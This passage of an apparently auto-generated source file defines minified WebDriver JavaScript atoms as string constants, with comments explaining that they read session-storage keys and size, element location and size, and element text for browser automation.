"\"invalid element coordinates\",12:\"invalid element state\",32:\"inval"\
"id selector\",51:\"invalid selector\",52:\"invalid selector\",17:\"java"\
"script error\",405:\"unsupported operation\",34:\"move target out of bo"\
"unds\",27:\"no such alert\",7:\"no such element\",8:\"no such frame\",2"\
"3:\"no such window\",28:\"script timeout\",33:\"session not created\",1"\
"0:\"stale element reference\",\n0:\"success\",21:\"timeout\",25:\"unabl"\
"e to set cookie\",26:\"unexpected alert open\"};f[13]=g;f[9]=\"unknown "\
"command\";e.prototype.toString=function(){return this.name+\": \"+this."\
"message};var h=this.navigator;var k=-1!=(h&&h.platform||\"\").indexOf("\
"\"Win\")&&!1;\nfunction m(){var a=c||c;switch(\"session_storage\"){case"\
" \"appcache\":return null!=a.applicationCache;case \"browser_connection"\
"\":return null!=a.navigator&&null!=a.navigator.onLine;case \"database\""\
":return null!=a.openDatabase;case \"location\":return k?!1:null!=a.navi"\
"gator&&null!=a.navigator.geolocation;case \"local_storage\":return null"\
"!=a.localStorage;case \"session_storage\":return null!=a.sessionStorage"\
"&&null!=a.sessionStorage.clear;default:throw new e(13,\"Unsupported API"\
" identifier provided as parameter\");}}\n;function n(a){this.a=a}n.prot"\
"otype.getItem=function(a){return this.a.getItem(a)};n.prototype.clear=f"\
"unction(){this.a.clear()};function p(a){var d;if(m())d=new n(c.sessionS"\
"torage);else throw new e(13,\"Session storage undefined\");return d.get"\
"Item(a)}var q=[\"_\"],r=this;q[0]in r||!r.execScript||r.execScript(\"va"\
"r \"+q[0]);for(var s;q.length&&(s=q.shift());)q.length||void 0===p?r=r["\
"s]?r[s]:r[s]={}:r[s]=p;; return this._.apply(null,arguments);}.apply({n"\
"avigator:typeof window!=undefined?window.navigator:null,document:typeof"\
" window!=undefined?window.document:null}, arguments);}"
# Minified, machine-generated JavaScript atom (do not hand-edit the payload).
# Returns window.sessionStorage.key(index) — the key name at the given
# numeric index; throws a WebDriver error with code 13 ("Session storage
# undefined") if session storage is not available.
GET_SESSION_STORAGE_KEY = \
"function(){return function(){var c=window;function e(a,d){this.code=a;t"\
"his.state=f[a]||g;this.message=d||\"\";var b=this.state.replace(/((?:^|"\
"\\s+)[a-z])/g,function(a){return a.toUpperCase().replace(/^[\\s\\xa0]+/"\
"g,\"\")}),l=b.length-5;if(0>l||b.indexOf(\"Error\",l)!=l)b+=\"Error\";t"\
"his.name=b;b=Error(this.message);b.name=this.name;this.stack=b.stack||"\
"\"\"}(function(){var a=Error;function d(){}d.prototype=a.prototype;e.b="\
"a.prototype;e.prototype=new d})();\nvar g=\"unknown error\",f={15:\"ele"\
"ment not selectable\",11:\"element not visible\",31:\"ime engine activa"\
"tion failed\",30:\"ime not available\",24:\"invalid cookie domain\",29:"\
"\"invalid element coordinates\",12:\"invalid element state\",32:\"inval"\
"id selector\",51:\"invalid selector\",52:\"invalid selector\",17:\"java"\
"script error\",405:\"unsupported operation\",34:\"move target out of bo"\
"unds\",27:\"no such alert\",7:\"no such element\",8:\"no such frame\",2"\
"3:\"no such window\",28:\"script timeout\",33:\"session not created\",1"\
"0:\"stale element reference\",\n0:\"success\",21:\"timeout\",25:\"unabl"\
"e to set cookie\",26:\"unexpected alert open\"};f[13]=g;f[9]=\"unknown "\
"command\";e.prototype.toString=function(){return this.name+\": \"+this."\
"message};var h=this.navigator;var k=-1!=(h&&h.platform||\"\").indexOf("\
"\"Win\")&&!1;\nfunction m(){var a=c||c;switch(\"session_storage\"){case"\
" \"appcache\":return null!=a.applicationCache;case \"browser_connection"\
"\":return null!=a.navigator&&null!=a.navigator.onLine;case \"database\""\
":return null!=a.openDatabase;case \"location\":return k?!1:null!=a.navi"\
"gator&&null!=a.navigator.geolocation;case \"local_storage\":return null"\
"!=a.localStorage;case \"session_storage\":return null!=a.sessionStorage"\
"&&null!=a.sessionStorage.clear;default:throw new e(13,\"Unsupported API"\
" identifier provided as parameter\");}}\n;function n(a){this.a=a}n.prot"\
"otype.clear=function(){this.a.clear()};n.prototype.key=function(a){retu"\
"rn this.a.key(a)};function p(a){var d;if(m())d=new n(c.sessionStorage);"\
"else throw new e(13,\"Session storage undefined\");return d.key(a)}var "\
"q=[\"_\"],r=this;q[0]in r||!r.execScript||r.execScript(\"var \"+q[0]);f"\
"or(var s;q.length&&(s=q.shift());)q.length||void 0===p?r=r[s]?r[s]:r[s]"\
"={}:r[s]=p;; return this._.apply(null,arguments);}.apply({navigator:typ"\
"eof window!=undefined?window.navigator:null,document:typeof window!=und"\
"efined?window.document:null}, arguments);}"
# Minified, machine-generated JavaScript atom (do not hand-edit the payload).
# Returns an array of every key currently in window.sessionStorage (iterates
# index 0 .. sessionStorage.length-1 calling key(i)); throws a WebDriver
# error with code 13 ("Session storage undefined") if unavailable.
GET_SESSION_STORAGE_KEYS = \
"function(){return function(){var d=window;function f(a,e){this.code=a;t"\
"his.state=g[a]||h;this.message=e||\"\";var b=this.state.replace(/((?:^|"\
"\\s+)[a-z])/g,function(a){return a.toUpperCase().replace(/^[\\s\\xa0]+/"\
"g,\"\")}),c=b.length-5;if(0>c||b.indexOf(\"Error\",c)!=c)b+=\"Error\";t"\
"his.name=b;b=Error(this.message);b.name=this.name;this.stack=b.stack||"\
"\"\"}(function(){var a=Error;function e(){}e.prototype=a.prototype;f.b="\
"a.prototype;f.prototype=new e})();\nvar h=\"unknown error\",g={15:\"ele"\
"ment not selectable\",11:\"element not visible\",31:\"ime engine activa"\
"tion failed\",30:\"ime not available\",24:\"invalid cookie domain\",29:"\
"\"invalid element coordinates\",12:\"invalid element state\",32:\"inval"\
"id selector\",51:\"invalid selector\",52:\"invalid selector\",17:\"java"\
"script error\",405:\"unsupported operation\",34:\"move target out of bo"\
"unds\",27:\"no such alert\",7:\"no such element\",8:\"no such frame\",2"\
"3:\"no such window\",28:\"script timeout\",33:\"session not created\",1"\
"0:\"stale element reference\",\n0:\"success\",21:\"timeout\",25:\"unabl"\
"e to set cookie\",26:\"unexpected alert open\"};g[13]=h;g[9]=\"unknown "\
"command\";f.prototype.toString=function(){return this.name+\": \"+this."\
"message};var k=this.navigator;var l=-1!=(k&&k.platform||\"\").indexOf("\
"\"Win\")&&!1;\nfunction m(){var a=d||d;switch(\"session_storage\"){case"\
" \"appcache\":return null!=a.applicationCache;case \"browser_connection"\
"\":return null!=a.navigator&&null!=a.navigator.onLine;case \"database\""\
":return null!=a.openDatabase;case \"location\":return l?!1:null!=a.navi"\
"gator&&null!=a.navigator.geolocation;case \"local_storage\":return null"\
"!=a.localStorage;case \"session_storage\":return null!=a.sessionStorage"\
"&&null!=a.sessionStorage.clear;default:throw new f(13,\"Unsupported API"\
" identifier provided as parameter\");}}\n;function n(a){this.a=a}n.prot"\
"otype.clear=function(){this.a.clear()};n.prototype.size=function(){retu"\
"rn this.a.length};n.prototype.key=function(a){return this.a.key(a)};fun"\
"ction p(){var a;if(m())a=new n(d.sessionStorage);else throw new f(13,\""\
"Session storage undefined\");for(var e=[],b=a.size(),c=0;c<b;c++)e[c]=a"\
".a.key(c);return e}var q=[\"_\"],r=this;q[0]in r||!r.execScript||r.exec"\
"Script(\"var \"+q[0]);for(var s;q.length&&(s=q.shift());)q.length||void"\
" 0===p?r=r[s]?r[s]:r[s]={}:r[s]=p;; return this._.apply(null,arguments)"\
";}.apply({navigator:typeof window!=undefined?window.navigator:null,docu"\
"ment:typeof window!=undefined?window.document:null}, arguments);}"
# Minified, machine-generated JavaScript atom (do not hand-edit the payload).
# Returns window.sessionStorage.length (the number of stored key/value
# pairs); throws a WebDriver error with code 13 ("Session storage undefined")
# if session storage is not available.
GET_SESSION_STORAGE_SIZE = \
"function(){return function(){var c=window;function d(a,g){this.code=a;t"\
"his.state=e[a]||f;this.message=g||\"\";var b=this.state.replace(/((?:^|"\
"\\s+)[a-z])/g,function(a){return a.toUpperCase().replace(/^[\\s\\xa0]+/"\
"g,\"\")}),l=b.length-5;if(0>l||b.indexOf(\"Error\",l)!=l)b+=\"Error\";t"\
"his.name=b;b=Error(this.message);b.name=this.name;this.stack=b.stack||"\
"\"\"}(function(){var a=Error;function g(){}g.prototype=a.prototype;d.b="\
"a.prototype;d.prototype=new g})();\nvar f=\"unknown error\",e={15:\"ele"\
"ment not selectable\",11:\"element not visible\",31:\"ime engine activa"\
"tion failed\",30:\"ime not available\",24:\"invalid cookie domain\",29:"\
"\"invalid element coordinates\",12:\"invalid element state\",32:\"inval"\
"id selector\",51:\"invalid selector\",52:\"invalid selector\",17:\"java"\
"script error\",405:\"unsupported operation\",34:\"move target out of bo"\
"unds\",27:\"no such alert\",7:\"no such element\",8:\"no such frame\",2"\
"3:\"no such window\",28:\"script timeout\",33:\"session not created\",1"\
"0:\"stale element reference\",\n0:\"success\",21:\"timeout\",25:\"unabl"\
"e to set cookie\",26:\"unexpected alert open\"};e[13]=f;e[9]=\"unknown "\
"command\";d.prototype.toString=function(){return this.name+\": \"+this."\
"message};var h=this.navigator;var k=-1!=(h&&h.platform||\"\").indexOf("\
"\"Win\")&&!1;\nfunction m(){var a=c||c;switch(\"session_storage\"){case"\
" \"appcache\":return null!=a.applicationCache;case \"browser_connection"\
"\":return null!=a.navigator&&null!=a.navigator.onLine;case \"database\""\
":return null!=a.openDatabase;case \"location\":return k?!1:null!=a.navi"\
"gator&&null!=a.navigator.geolocation;case \"local_storage\":return null"\
"!=a.localStorage;case \"session_storage\":return null!=a.sessionStorage"\
"&&null!=a.sessionStorage.clear;default:throw new d(13,\"Unsupported API"\
" identifier provided as parameter\");}}\n;function n(a){this.a=a}n.prot"\
"otype.clear=function(){this.a.clear()};n.prototype.size=function(){retu"\
"rn this.a.length};function p(){var a;if(m())a=new n(c.sessionStorage);e"\
"lse throw new d(13,\"Session storage undefined\");return a.size()}var q"\
"=[\"_\"],r=this;q[0]in r||!r.execScript||r.execScript(\"var \"+q[0]);fo"\
"r(var s;q.length&&(s=q.shift());)q.length||void 0===p?r=r[s]?r[s]:r[s]="\
"{}:r[s]=p;; return this._.apply(null,arguments);}.apply({navigator:type"\
"of window!=undefined?window.navigator:null,document:typeof window!=unde"\
"fined?window.document:null}, arguments);}"
# Minified, machine-generated JavaScript atom (do not hand-edit the payload).
# Computes a DOM element's position as an {x, y} point in document
# coordinates: prefers getBoundingClientRect() plus the window scroll offset,
# falls back to getBoxObjectFor() or walking the offsetParent chain, and
# corrects for scrolled/positioned ancestor containers.
GET_LOCATION = \
"function(){return function(){var g=this;var h;function k(a,b){this.x=vo"\
"id 0!==a?a:0;this.y=void 0!==b?b:0}k.prototype.toString=function(){retu"\
"rn\"(\"+this.x+\", \"+this.y+\")\"};function l(a){return 9==a.nodeType?"\
"a:a.ownerDocument||a.document}function m(a){this.a=a||g.document||docum"\
"ent};function n(a){var b;a:{b=l(a);if(b.defaultView&&b.defaultView.getC"\
"omputedStyle&&(b=b.defaultView.getComputedStyle(a,null))){b=b.position|"\
"|b.getPropertyValue(\"position\")||\"\";break a}b=\"\"}return b||(a.cur"\
"rentStyle?a.currentStyle.position:null)||a.style&&a.style.position}\nfu"\
"nction p(a){var b=l(a),f=n(a),c=\"fixed\"==f||\"absolute\"==f;for(a=a.p"\
"arentNode;a&&a!=b;a=a.parentNode)if(f=n(a),c=c&&\"static\"==f&&a!=b.doc"\
"umentElement&&a!=b.body,!c&&(a.scrollWidth>a.clientWidth||a.scrollHeigh"\
"t>a.clientHeight||\"fixed\"==f||\"absolute\"==f||\"relative\"==f))retur"\
"n a;return null};function q(a){var b=l(a),f=n(a),c=new k(0,0),e=(b?l(b)"\
":document).documentElement;if(a==e)return c;if(a.getBoundingClientRect)"\
"{a:{var d;try{d=a.getBoundingClientRect()}catch(u){a={left:0,top:0,righ"\
"t:0,bottom:0};break a}a=d}e=(b?new m(l(b)):h||(h=new m)).a;b=e.body;e=e"\
".parentWindow||e.defaultView;b=new k(e.pageXOffset||b.scrollLeft,e.page"\
"YOffset||b.scrollTop);c.x=a.left+b.x;c.y=a.top+b.y}else if(b.getBoxObje"\
"ctFor)a=b.getBoxObjectFor(a),b=b.getBoxObjectFor(e),c.x=a.screenX-b.scr"\
"eenX,c.y=a.screenY-b.screenY;\nelse{d=a;do{c.x+=d.offsetLeft;c.y+=d.off"\
"setTop;d!=a&&(c.x+=d.clientLeft||0,c.y+=d.clientTop||0);if(\"fixed\"==n"\
"(d)){c.x+=b.body.scrollLeft;c.y+=b.body.scrollTop;break}d=d.offsetParen"\
"t}while(d&&d!=a);\"absolute\"==f&&(c.y-=b.body.offsetTop);for(d=a;(d=p("\
"d))&&d!=b.body&&d!=e;)c.x-=d.scrollLeft,c.y-=d.scrollTop}return c}var r"\
"=[\"_\"],s=g;r[0]in s||!s.execScript||s.execScript(\"var \"+r[0]);for(v"\
"ar t;r.length&&(t=r.shift());)r.length||void 0===q?s=s[t]?s[t]:s[t]={}:"\
"s[t]=q;; return this._.apply(null,arguments);}.apply({navigator:typeof "\
"window!=undefined?window.navigator:null,document:typeof window!=undefin"\
"ed?window.document:null}, arguments);}"
# Minified, machine-generated JavaScript atom (do not hand-edit the payload).
# Computes a DOM element's rendered size as a {width, height} pair from
# offsetWidth/offsetHeight or getBoundingClientRect(); if the element is
# display:none it is temporarily given hidden/absolute/inline style so it
# can be measured, then the original style values are restored.
GET_SIZE = \
"function(){return function(){function c(a,b){this.width=a;this.height=b"\
"}c.prototype.toString=function(){return\"(\"+this.width+\" x \"+this.he"\
"ight+\")\"};function d(a){var b=a.offsetWidth,f=a.offsetHeight;if((void"\
" 0===b||!b&&!f)&&a.getBoundingClientRect){a:{var g;try{g=a.getBoundingC"\
"lientRect()}catch(l){a={left:0,top:0,right:0,bottom:0};break a}a=g}retu"\
"rn new c(a.right-a.left,a.bottom-a.top)}return new c(b,f)};function e(a"\
"){var b;a:{b=9==a.nodeType?a:a.ownerDocument||a.document;if(b.defaultVi"\
"ew&&b.defaultView.getComputedStyle&&(b=b.defaultView.getComputedStyle(a"\
",null))){b=b.display||b.getPropertyValue(\"display\")||\"\";break a}b="\
"\"\"}if(\"none\"!=(b||(a.currentStyle?a.currentStyle.display:null)||a.s"\
"tyle&&a.style.display))return d(a);b=a.style;var f=b.display,g=b.visibi"\
"lity,l=b.position;b.visibility=\"hidden\";b.position=\"absolute\";b.dis"\
"play=\"inline\";a=d(a);b.display=f;b.position=l;b.visibility=g;return a"\
"}\nvar h=[\"_\"],k=this;h[0]in k||!k.execScript||k.execScript(\"var \"+"\
"h[0]);for(var m;h.length&&(m=h.shift());)h.length||void 0===e?k=k[m]?k["\
"m]:k[m]={}:k[m]=e;; return this._.apply(null,arguments);}.apply({naviga"\
"tor:typeof window!=undefined?window.navigator:null,document:typeof wind"\
"ow!=undefined?window.document:null}, arguments);}"
GET_TEXT = \
"function(){return function(){function f(a){return function(){return a}}"\
"var k=this;\nfunction l(a){var b=typeof a;if(\"object\"==b)if(a){if(a i"\
"nstanceof Array)return\"array\";if(a instanceof Object)return b;var c=O"\
"bject.prototype.toString.call(a);if(\"[object Window]\"==c)return\"obje"\
"ct\";if(\"[object Array]\"==c||\"number\"==typeof a.length&&\"undefined"\
"\"!=typeof a.splice&&\"undefined\"!=typeof a.propertyIsEnumerable&&!a.p"\
"ropertyIsEnumerable(\"splice\"))return\"array\";if(\"[object Function]"\
"\"==c||\"undefined\"!=typeof a.call&&\"undefined\"!=typeof a.propertyIs"\
"Enumerable&&!a.propertyIsEnumerable(\"call\"))return\"function\"}else r"\
"eturn\"null\";\nelse if(\"function\"==b&&\"undefined\"==typeof a.call)r"\
"eturn\"object\";return b}function m(a){return\"string\"==typeof a};func"\
"tion aa(a){var b=a.length-1;return 0<=b&&a.indexOf(\" \",b)==b}function"\
" ba(a){return String(a).replace(/\\-([a-z])/g,function(a,c){return c.to"\
"UpperCase()})};var ca=Array.prototype;function p(a,b){for(var c=a.lengt"\
"h,d=m(a)?a.split(\"\"):a,e=0;e<c;e++)e in d&&b.call(void 0,d[e],e,a)}fu"\
"nction da(a,b){if(a.reduce)return a.reduce(b,\"\");var c=\"\";p(a,funct"\
"ion(d,e){c=b.call(void 0,c,d,e,a)});return c}function ea(a,b){for(var c"\
"=a.length,d=m(a)?a.split(\"\"):a,e=0;e<c;e++)if(e in d&&b.call(void 0,d"\
"[e],e,a))return!0;return!1}\nfunction q(a,b){var c;a:if(m(a))c=m(b)&&1="\
"=b.length?a.indexOf(b,0):-1;else{for(c=0;c<a.length;c++)if(c in a&&a[c]"\
"===b)break a;c=-1}return 0<=c}function fa(a,b,c){return 2>=arguments.le"\
"ngth?ca.slice.call(a,b):ca.slice.call(a,b,c)};var r={aliceblue:\"#f0f8f"\
"f\",antiquewhite:\"#faebd7\",aqua:\"#00ffff\",aquamarine:\"#7fffd4\",az"\
"ure:\"#f0ffff\",beige:\"#f5f5dc\",bisque:\"#ffe4c4\",black:\"#000000\","\
"blanchedalmond:\"#ffebcd\",blue:\"#0000ff\",blueviolet:\"#8a2be2\",brow"\
"n:\"#a52a2a\",burlywood:\"#deb887\",cadetblue:\"#5f9ea0\",chartreuse:\""\
"#7fff00\",chocolate:\"#d2691e\",coral:\"#ff7f50\",cornflowerblue:\"#649"\
"5ed\",cornsilk:\"#fff8dc\",crimson:\"#dc143c\",cyan:\"#00ffff\",darkblu"\
"e:\"#00008b\",darkcyan:\"#008b8b\",darkgoldenrod:\"#b8860b\",darkgray:"\
"\"#a9a9a9\",darkgreen:\"#006400\",\ndarkgrey:\"#a9a9a9\",darkkhaki:\"#b"\
"db76b\",darkmagenta:\"#8b008b\",darkolivegreen:\"#556b2f\",darkorange:"\
"\"#ff8c00\",darkorchid:\"#9932cc\",darkred:\"#8b0000\",darksalmon:\"#e9"\
"967a\",darkseagreen:\"#8fbc8f\",darkslateblue:\"#483d8b\",darkslategray"\
":\"#2f4f4f\",darkslategrey:\"#2f4f4f\",darkturquoise:\"#00ced1\",darkvi"\
"olet:\"#9400d3\",deeppink:\"#ff1493\",deepskyblue:\"#00bfff\",dimgray:"\
"\"#696969\",dimgrey:\"#696969\",dodgerblue:\"#1e90ff\",firebrick:\"#b22"\
"222\",floralwhite:\"#fffaf0\",forestgreen:\"#228b22\",fuchsia:\"#ff00ff"\
"\",gainsboro:\"#dcdcdc\",\nghostwhite:\"#f8f8ff\",gold:\"#ffd700\",gold"\
"enrod:\"#daa520\",gray:\"#808080\",green:\"#008000\",greenyellow:\"#adf"\
"f2f\",grey:\"#808080\",honeydew:\"#f0fff0\",hotpink:\"#ff69b4\",indianr"\
"ed:\"#cd5c5c\",indigo:\"#4b0082\",ivory:\"#fffff0\",khaki:\"#f0e68c\",l"\
"avender:\"#e6e6fa\",lavenderblush:\"#fff0f5\",lawngreen:\"#7cfc00\",lem"\
"onchiffon:\"#fffacd\",lightblue:\"#add8e6\",lightcoral:\"#f08080\",ligh"\
"tcyan:\"#e0ffff\",lightgoldenrodyellow:\"#fafad2\",lightgray:\"#d3d3d3"\
"\",lightgreen:\"#90ee90\",lightgrey:\"#d3d3d3\",lightpink:\"#ffb6c1\",l"\
"ightsalmon:\"#ffa07a\",\nlightseagreen:\"#20b2aa\",lightskyblue:\"#87ce"\
"fa\",lightslategray:\"#778899\",lightslategrey:\"#778899\",lightsteelbl"\
"ue:\"#b0c4de\",lightyellow:\"#ffffe0\",lime:\"#00ff00\",limegreen:\"#32"\
"cd32\",linen:\"#faf0e6\",magenta:\"#ff00ff\",maroon:\"#800000\",mediuma"\
"quamarine:\"#66cdaa\",mediumblue:\"#0000cd\",mediumorchid:\"#ba55d3\",m"\
"ediumpurple:\"#9370db\",mediumseagreen:\"#3cb371\",mediumslateblue:\"#7"\
"b68ee\",mediumspringgreen:\"#00fa9a\",mediumturquoise:\"#48d1cc\",mediu"\
"mvioletred:\"#c71585\",midnightblue:\"#191970\",mintcream:\"#f5fffa\",m"\
"istyrose:\"#ffe4e1\",\nmoccasin:\"#ffe4b5\",navajowhite:\"#ffdead\",nav"\
"y:\"#000080\",oldlace:\"#fdf5e6\",olive:\"#808000\",olivedrab:\"#6b8e23"\
"\",orange:\"#ffa500\",orangered:\"#ff4500\",orchid:\"#da70d6\",palegold"\
"enrod:\"#eee8aa\",palegreen:\"#98fb98\",paleturquoise:\"#afeeee\",palev"\
"ioletred:\"#db7093\",papayawhip:\"#ffefd5\",peachpuff:\"#ffdab9\",peru:"\
"\"#cd853f\",pink:\"#ffc0cb\",plum:\"#dda0dd\",powderblue:\"#b0e0e6\",pu"\
"rple:\"#800080\",red:\"#ff0000\",rosybrown:\"#bc8f8f\",royalblue:\"#416"\
"9e1\",saddlebrown:\"#8b4513\",salmon:\"#fa8072\",sandybrown:\"#f4a460\""\
",seagreen:\"#2e8b57\",\nseashell:\"#fff5ee\",sienna:\"#a0522d\",silver:"\
"\"#c0c0c0\",skyblue:\"#87ceeb\",slateblue:\"#6a5acd\",slategray:\"#7080"\
"90\",slategrey:\"#708090\",snow:\"#fffafa\",springgreen:\"#00ff7f\",ste"\
"elblue:\"#4682b4\",tan:\"#d2b48c\",teal:\"#008080\",thistle:\"#d8bfd8\""\
",tomato:\"#ff6347\",turquoise:\"#40e0d0\",violet:\"#ee82ee\",wheat:\"#f"\
"5deb3\",white:\"#ffffff\",whitesmoke:\"#f5f5f5\",yellow:\"#ffff00\",yel"\
"lowgreen:\"#9acd32\"};var ga=\"background-color border-top-color border"\
"-right-color border-bottom-color border-left-color color outline-color"\
"\".split(\" \"),ha=/#([0-9a-fA-F])([0-9a-fA-F])([0-9a-fA-F])/;function "\
"ia(a){if(!ja.test(a))throw Error(\"'\"+a+\"' is not a valid hex color\""\
");4==a.length&&(a=a.replace(ha,\"#$1$1$2$2$3$3\"));return a.toLowerCase"\
"()}var ja=/^#(?:[0-9a-f]{3}){1,2}$/i,ka=/^(?:rgba)?\\((\\d{1,3}),\\s?("\
"\\d{1,3}),\\s?(\\d{1,3}),\\s?(0|1|0\\.\\d*)\\)$/i;\nfunction la(a){var "\
"b=a.match(ka);if(b){a=Number(b[1]);var c=Number(b[2]),d=Number(b[3]),b="\
"Number(b[4]);if(0<=a&&255>=a&&0<=c&&255>=c&&0<=d&&255>=d&&0<=b&&1>=b)re"\
"turn[a,c,d,b]}return[]}var ma=/^(?:rgb)?\\((0|[1-9]\\d{0,2}),\\s?(0|[1-"\
"9]\\d{0,2}),\\s?(0|[1-9]\\d{0,2})\\)$/i;function na(a){var b=a.match(ma"\
");if(b){a=Number(b[1]);var c=Number(b[2]),b=Number(b[3]);if(0<=a&&255>="\
"a&&0<=c&&255>=c&&0<=b&&255>=b)return[a,c,b]}return[]};function s(a,b){t"\
"his.code=a;this.state=oa[a]||pa;this.message=b||\"\";var c=this.state.r"\
"eplace(/((?:^|\\s+)[a-z])/g,function(a){return a.toUpperCase().replace("\
"/^[\\s\\xa0]+/g,\"\")}),d=c.length-5;if(0>d||c.indexOf(\"Error\",d)!=d)"\
"c+=\"Error\";this.name=c;c=Error(this.message);c.name=this.name;this.st"\
"ack=c.stack||\"\"}(function(){var a=Error;function b(){}b.prototype=a.p"\
"rototype;s.U=a.prototype;s.prototype=new b})();\nvar pa=\"unknown error"\
"\",oa={15:\"element not selectable\",11:\"element not visible\",31:\"im"\
"e engine activation failed\",30:\"ime not available\",24:\"invalid cook"\
"ie domain\",29:\"invalid element coordinates\",12:\"invalid element sta"\
"te\",32:\"invalid selector\",51:\"invalid selector\",52:\"invalid selec"\
"tor\",17:\"javascript error\",405:\"unsupported operation\",34:\"move t"\
"arget out of bounds\",27:\"no such alert\",7:\"no such element\",8:\"no"\
" such frame\",23:\"no such window\",28:\"script timeout\",33:\"session "\
"not created\",10:\"stale element reference\",\n0:\"success\",21:\"timeo"\
"ut\",25:\"unable to set cookie\",26:\"unexpected alert open\"};oa[13]=p"\
"a;oa[9]=\"unknown command\";s.prototype.toString=function(){return this"\
".name+\": \"+this.message};var t,v,w,qa=k.navigator;w=qa&&qa.platform||"\
"\"\";t=-1!=w.indexOf(\"Mac\");v=-1!=w.indexOf(\"Win\");var x=-1!=w.inde"\
"xOf(\"Linux\");var y;function z(a,b){this.x=void 0!==a?a:0;this.y=void "\
"0!==b?b:0}z.prototype.toString=function(){return\"(\"+this.x+\", \"+thi"\
"s.y+\")\"};z.prototype.ceil=function(){this.x=Math.ceil(this.x);this.y="\
"Math.ceil(this.y);return this};z.prototype.floor=function(){this.x=Math"\
".floor(this.x);this.y=Math.floor(this.y);return this};z.prototype.round"\
"=function(){this.x=Math.round(this.x);this.y=Math.round(this.y);return "\
"this};function B(a,b){this.width=a;this.height=b}B.prototype.toString=f"\
"unction(){return\"(\"+this.width+\" x \"+this.height+\")\"};B.prototype"\
".ceil=function(){this.width=Math.ceil(this.width);this.height=Math.ceil"\
"(this.height);return this};B.prototype.floor=function(){this.width=Math"\
".floor(this.width);this.height=Math.floor(this.height);return this};B.p"\
"rototype.round=function(){this.width=Math.round(this.width);this.height"\
"=Math.round(this.height);return this};var ra=3;function sa(a){for(;a&&1"\
"!=a.nodeType;)a=a.previousSibling;return a}function ta(a,b){if(a.contai"\
"ns&&1==b.nodeType)return a==b||a.contains(b);if(\"undefined\"!=typeof a"\
".compareDocumentPosition)return a==b||Boolean(a.compareDocumentPosition"\
"(b)&16);for(;b&&a!=b;)b=b.parentNode;return b==a}\nfunction ua(a,b){if("\
"a==b)return 0;if(a.compareDocumentPosition)return a.compareDocumentPosi"\
"tion(b)&2?1:-1;if(\"sourceIndex\"in a||a.parentNode&&\"sourceIndex\"in "\
"a.parentNode){var c=1==a.nodeType,d=1==b.nodeType;if(c&&d)return a.sour"\
"ceIndex-b.sourceIndex;var e=a.parentNode,g=b.parentNode;return e==g?va("\
"a,b):!c&&ta(e,b)?-1*wa(a,b):!d&&ta(g,a)?wa(b,a):(c?a.sourceIndex:e.sour"\
"ceIndex)-(d?b.sourceIndex:g.sourceIndex)}d=C(a);c=d.createRange();c.sel"\
"ectNode(a);c.collapse(!0);d=d.createRange();d.selectNode(b);\nd.collaps"\
"e(!0);return c.compareBoundaryPoints(k.Range.START_TO_END,d)}function w"\
"a(a,b){var c=a.parentNode;if(c==b)return-1;for(var d=b;d.parentNode!=c;"\
")d=d.parentNode;return va(d,a)}function va(a,b){for(var c=b;c=c.previou"\
"sSibling;)if(c==a)return-1;return 1}function C(a){return 9==a.nodeType?"\
"a:a.ownerDocument||a.document}function xa(a,b){a=a.parentNode;for(var c"\
"=0;a;){if(b(a))return a;a=a.parentNode;c++}return null}function D(a){th"\
"is.B=a||k.document||document}\nfunction ya(a){var b=a.B;a=b.body;b=b.pa"\
"rentWindow||b.defaultView;return new z(b.pageXOffset||a.scrollLeft,b.pa"\
"geYOffset||a.scrollTop)}D.prototype.contains=ta;function E(a){var b=nul"\
"l,c=a.nodeType;1==c&&(b=a.textContent,b=void 0==b||null==b?a.innerText:"\
"b,b=void 0==b||null==b?\"\":b);if(\"string\"!=typeof b)if(9==c||1==c){a"\
"=9==c?a.documentElement:a.firstChild;for(var c=0,d=[],b=\"\";a;){do 1!="\
"a.nodeType&&(b+=a.nodeValue),d[c++]=a;while(a=a.firstChild);for(;c&&!(a"\
"=d[--c].nextSibling););}}else b=a.nodeValue;return\"\"+b}\nfunction F(a"\
",b,c){if(null===b)return!0;try{if(!a.getAttribute)return!1}catch(d){ret"\
"urn!1}return null==c?!!a.getAttribute(b):a.getAttribute(b,2)==c}functio"\
"n G(a,b,c,d,e){return za.call(null,a,b,m(c)?c:null,m(d)?d:null,e||new H"\
")}\nfunction za(a,b,c,d,e){b.getElementsByName&&d&&\"name\"==c?(b=b.get"\
"ElementsByName(d),p(b,function(b){a.matches(b)&&e.add(b)})):b.getElemen"\
"tsByClassName&&d&&\"class\"==c?(b=b.getElementsByClassName(d),p(b,funct"\
"ion(b){b.className==d&&a.matches(b)&&e.add(b)})):b.getElementsByTagName"\
"&&(b=b.getElementsByTagName(a.getName()),p(b,function(a){F(a,c,d)&&e.ad"\
"d(a)}));return e}function Aa(a,b,c,d,e){for(b=b.firstChild;b;b=b.nextSi"\
"bling)F(b,c,d)&&a.matches(b)&&e.add(b);return e};function H(){this.g=th"\
"is.f=null;this.m=0}function Ba(a){this.t=a;this.next=this.o=null}H.prot"\
"otype.unshift=function(a){a=new Ba(a);a.next=this.f;this.g?this.f.o=a:t"\
"his.f=this.g=a;this.f=a;this.m++};H.prototype.add=function(a){a=new Ba("\
"a);a.o=this.g;this.f?this.g.next=a:this.f=this.g=a;this.g=a;this.m++};f"\
"unction Ca(a){return(a=a.f)?a.t:null}function I(a){return new Da(a,!1)}"\
"function Da(a,b){this.Q=a;this.q=(this.u=b)?a.g:a.f;this.C=null}\nDa.pr"\
"ototype.next=function(){var a=this.q;if(null==a)return null;var b=this."\
"C=a;this.q=this.u?a.o:a.next;return b.t};function J(a,b,c,d,e){b=b.eval"\
"uate(d);c=c.evaluate(d);var g;if(b instanceof H&&c instanceof H){e=I(b)"\
";for(d=e.next();d;d=e.next())for(b=I(c),g=b.next();g;g=b.next())if(a(E("\
"d),E(g)))return!0;return!1}if(b instanceof H||c instanceof H){b instanc"\
"eof H?e=b:(e=c,c=b);e=I(e);b=typeof c;for(d=e.next();d;d=e.next()){swit"\
"ch(b){case \"number\":d=+E(d);break;case \"boolean\":d=!!E(d);break;cas"\
"e \"string\":d=E(d);break;default:throw Error(\"Illegal primitive type "\
"for comparison.\");}if(a(d,c))return!0}return!1}return e?\n\"boolean\"="\
"=typeof b||\"boolean\"==typeof c?a(!!b,!!c):\"number\"==typeof b||\"num"\
"ber\"==typeof c?a(+b,+c):a(b,c):a(+b,+c)}function Ea(a,b,c,d){this.D=a;"\
"this.S=b;this.A=c;this.k=d}Ea.prototype.toString=function(){return this"\
".D};var Fa={};function K(a,b,c,d){if(a in Fa)throw Error(\"Binary opera"\
